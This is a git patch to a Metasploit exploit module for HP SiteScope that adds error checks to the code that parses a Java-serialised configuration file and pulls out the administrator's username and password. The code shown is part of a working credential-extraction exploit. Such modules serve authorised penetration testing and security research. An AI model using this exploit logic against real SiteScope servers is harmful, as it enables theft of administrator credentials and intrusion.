From 2f87af1c3a405b25957d6722895fc1e2eedbc820 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 5 Sep 2012 20:58:55 +0200 Subject: [PATCH] add some checks while parsing the java serialization config file --- .../http/hp_sitescope_uploadfileshandler.rb | 23 +++++++++++++++++-- 1 file changed, 21 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/http/hp_sitescope_uploadfileshandler.rb b/modules/exploits/windows/http/hp_sitescope_uploadfileshandler.rb index 38b260ace1..37c9e19578 100644 --- a/modules/exploits/windows/http/hp_sitescope_uploadfileshandler.rb +++ b/modules/exploits/windows/http/hp_sitescope_uploadfileshandler.rb @@ -91,9 +91,19 @@ class Metasploit3 < Msf::Exploit::Remote admin_data = conf.split("\x03\x5F\x69\x64\x74\x00\x0D\x61\x64\x6D\x69\x6E\x69\x73\x74\x72\x61\x74\x6F\x72\x74\x00")[1] - admin_password = admin_data.split(/\x09_passwordt\x00/)[1] - password_length = admin_password.unpack("C").first + if not admin_data or admin_data.empty? + print_error("#{@peer} - Error retrieving the HP SiteScope administrator credentials") + return + end + admin_password = admin_data.split(/\x09_passwordt\x00/)[1] + + if not admin_password or admin_password.empty? + print_error("#{@peer} - Error retrieving the HP SiteScope administrator credentials") + return + end + + password_length = admin_password.unpack("C").first if password_length > 0 password = admin_password[1, password_length] else @@ -102,7 +112,16 @@ class Metasploit3 < Msf::Exploit::Remote admin_user_type, admin_user = admin_password.split(/\x06(_login[q|t])\x00/)[1, 2] + if not admin_user_type or admin_user_type.empty? + print_error("#{@peer} - Error retrieving the HP SiteScope administrator credentials") + return + end + if admin_user_type == "_logint" + if not admin_user or admin_user.empty? + print_error("#{@peer} - Error retrieving the HP SiteScope administrator credentials") + return + end user_length = admin_user.unpack("C").first else user_length = 0